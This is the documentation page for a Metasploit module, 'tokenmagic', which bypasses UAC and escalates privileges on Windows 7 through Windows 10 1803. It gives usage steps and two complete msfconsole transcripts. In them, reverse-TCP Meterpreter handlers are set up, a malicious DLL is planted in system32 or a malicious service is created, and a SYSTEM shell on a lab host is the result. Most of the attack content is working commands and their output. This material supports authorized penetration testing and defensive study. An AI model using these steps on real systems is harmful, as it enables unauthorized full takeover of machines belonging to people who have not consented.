Grant Willcox
10 KiB
10 KiB
Vulnerable Application
This module exploits a UAC bypass in windows that allows the attacker to obtain remote code execution by leveraged a privileged file write. From the PoC:
Essentially we duplicate the token of an elevated process, lower it's mandatory integrity level, use it to create a new restricted token, impersonate it and use the Secondary Logon service to spawn a new process with High IL. Like playing hide-and-go-seek with tokens
The module exploits the high IL gained from the "token magic" by either starting a malicious service or by preforming a DLL hijack
on a known DLL in system32.
Installation And Setup
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell. The technique may work on Windows 7 sp0, but loading powershell appears to crash the session. You might be able to upload and run the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.
Verification Steps
- Start msfconsole
- Get a Meterpreter session
- Do:
use exploit/windows/local/tokenmagic - Set the
METHODof exploitation, eitherDLLorSERVICE - Set the
LHOST,SESSIONandPAYLOADoptions - Do:
run - You should get a shell, the exploitation process should be fairly instantaneous
Options
METHOD Select between DLL hijacking and service exploitation
- DLL mode: Using the elevated privileges from token magic the module will write a malicious file to
c:\windows\system32\windowscoredeviceinfo.dll, a temporary host process is spawned and a DLL trigger is injected into the process to call theusoclient. When theusoclientEXE runs it loads the the malicious DLLwindowscoredeviceinfo.dllwithSYSTEMlevel privileges. - SERVICE mode: Using the elevated privileges from token magic the module, create a malicious service, and then start it with
SYSTEMlevel privileges
SERVICE_FILENAME Filename for Service Payload (Random by default).
SERVICE_NAME Service Name to use (Random by default).
SESSION The session to run this module on.
WRITABLE_DIR
Directory to write file to (%TEMP% by default).
Scenarios
Tested on Windows 10 x64 1803 (Build 17134) via DLL Hijacking
msf6 > use multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
emsf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:49941) at 2021-05-14 12:38:30 -0400
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/local/tokenmagic) > set lport 4443
lport => 4443
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set method DLL
method => DLL
msf6 exploit(windows/local/tokenmagic) > options
Module options (exploit/windows/local/tokenmagic):
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD DLL yes SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10
minutes to trigger (Accepted: SERVICE, DLL)
SERVICE_FILENAME IfoTziL no Filename for Service Payload (Random by default).
SERVICE_NAME NTSHIUUVp no Service Name to use (Random by default).
SESSION 1 yes The session to run this module on.
WRITABLE_DIR no Directory to write file to (%TEMP% by default).
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.199.1 yes The listen address (an interface may be specified)
LPORT 4443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/local/tokenmagic) > run
[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 1
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\WindowsCoreDeviceInfo.dll
[*] Running Exploit on DESKTOP-O5RD7G3
[*] Executing TokenMagic PowerShell script
[*] Reflectively injecting exploit DLL into a spare process and triggering the LPE...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[+] Enjoy the shell!
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4443 -> 172.16.199.135:49803) at 2021-05-14 12:52:58 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-O5RD7G3
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >
Tested on Windows 10 x64 1803 (Build 17134) via service exploitation
msf6 > use multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.135:49874) at 2021-05-14 12:18:40 -0400
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > options
Module options (exploit/windows/local/tokenmagic):
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD SERVICE yes SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10
minutes to trigger (Accepted: SERVICE, DLL)
SERVICE_FILENAME dbfkhe no Filename for Service Payload (Random by default).
SERVICE_NAME BNPzhEQL no Service Name to use (Random by default).
SESSION yes The session to run this module on.
WRITABLE_DIR no Directory to write file to (%TEMP% by default).
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/local/tokenmagic) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(windows/local/tokenmagic) > set lport 4443
lport => 4443
msf6 exploit(windows/local/tokenmagic) > set session 2
session => 2
msf6 exploit(windows/local/tokenmagic) > run
[*] Started reverse TCP handler on 172.16.199.1:4443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Checking Target
[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 2
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\dbfkhe.exe
[*] Running Exploit on DESKTOP-O5RD7G3
[*] Executing TokenMagic PowerShell script
[+] Enjoy the shell!
[*] Sending stage (200262 bytes) to 172.16.199.135
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\dbfkhe.exe
[*] Meterpreter session 3 opened (172.16.199.1:4443 -> 172.16.199.135:49876) at 2021-05-14 12:19:24 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-O5RD7G3
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x64/windows
meterpreter >